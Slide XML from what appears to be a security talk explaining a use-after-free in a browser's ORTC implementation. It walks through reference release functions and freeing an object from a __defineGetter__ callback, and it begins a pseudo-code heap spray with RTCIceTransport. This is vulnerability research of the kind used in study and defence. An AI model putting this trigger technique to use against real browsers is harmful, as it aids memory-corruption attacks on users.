          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9335069" y="3012358"/>
            <a:ext cx="2696511" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The function CJScript9Holder::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VarRelease</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> will release the reference added by the previous function CJScript9Holder::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VarAddRef</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{011E0F7E-E78C-4D98-A315-F3EDC78EBD6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1460501" y="5399881"/>
            <a:ext cx="2829559" cy="16521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4" name="连接符: 肘形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A321BE90-156F-4F49-8253-EE78D3AFF4B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="21" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="5580745" y="1645557"/>
            <a:ext cx="1048860" cy="6459788"/>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7" name="矩形 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{609B44DA-E105-493E-86B6-55309FF9FD8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1688997" y="6114428"/>
            <a:ext cx="6853023" cy="21201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039AE2F8-8D9B-4C53-A07F-753787AD3BE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="6674940"/>
            <a:ext cx="10754484" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>After all the references are released, the function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CModernArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;media::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SincResampler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> *, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CDefaultTraits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;media::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SincResampler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> *&gt;&gt;::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RemoveAll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> will free the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CModernArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> structure.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="连接符: 肘形 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A82E85D-044C-425B-B417-C8B65DAABAFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="27" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8542020" y="6220436"/>
            <a:ext cx="3290589" cy="853464"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 11078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2" name="矩形 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCEC9F62-91C5-4F4B-A4EF-6D478E94FAC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="978639" y="7975402"/>
            <a:ext cx="10953455" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dynamic objects can be prevented from being recycled by the GC by adding and releasing references to the functions CJScript9Holder::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VarAddRef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and CJScript9Holder::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VarRelease</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Therefore, there may be a chance to release the dynamic object in the function ORTC:: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UnpackArrayObjectVar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, causing the UAF to occur.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2275872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5" name="矩形 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E13A386-09F1-4A98-B289-38A97674C2EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2557916"/>
            <a:ext cx="10953456" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Free dynamic object in callback function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E0968AF-77A2-4CD8-A616-026BC1557FEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="3033339"/>
            <a:ext cx="6127696" cy="5539161"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{119518C0-A59E-44BB-B7A4-DC8F7E29A5D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="8615369"/>
            <a:ext cx="6327284" cy="1475995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26D60A1D-0C5C-4A19-8264-B011ED5AAA09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7181097" y="3045511"/>
            <a:ext cx="4731503" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The function can be bound to an incoming property by obj.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>defineGetter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>__, and the callback function is called when accessing, free dynamic object</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="矩形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F2768B7-B3BC-4A27-A39F-7D4A0ACC5B01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1756007" y="6895727"/>
            <a:ext cx="2937913" cy="17563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ADB62247-56E6-4CC9-A1D3-619E687536EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1077978" y="9707880"/>
            <a:ext cx="5886448" cy="13345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 name="连接符: 肘形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A67910B-3680-45B5-BA65-6A85030C4903}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="22" idx="1"/>
            <a:endCxn id="23" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1077979" y="6983544"/>
            <a:ext cx="678029" cy="2791062"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 133715"/>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矩形 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5055A715-BC14-4A64-A3E1-E0175879A3D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1070358" y="9166860"/>
            <a:ext cx="5886448" cy="13345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6" name="连接符: 肘形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53AD69CF-1734-4B6E-A888-C0B59CBB236F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="23" idx="3"/>
            <a:endCxn id="25" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6956806" y="9233586"/>
            <a:ext cx="7620" cy="541020"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -300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94949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52F9F16A-E280-4EE3-A741-2E7A55756E6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2443527"/>
            <a:ext cx="10953455" cy="7791335"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="2">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="SimHei" charset="-122"/>
                <a:ea typeface="SimHei" charset="-122"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>Sample pseudo code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>ice_tran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>RTCIceTransport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>();	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>cnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t> = 0x50000;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>obj_arr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> = new Array(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>for (let </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=0;i&lt;cnt-1;i++){			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>obj_arr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>] = {		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	key0: 0x00000002,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	key1: 0x00000004,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	key2: 0x00000006,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	key3: 0x00000008,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	key4: 0x0000000a,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	key5: 0x0000000c,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>}</a:t>
            </a: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r>
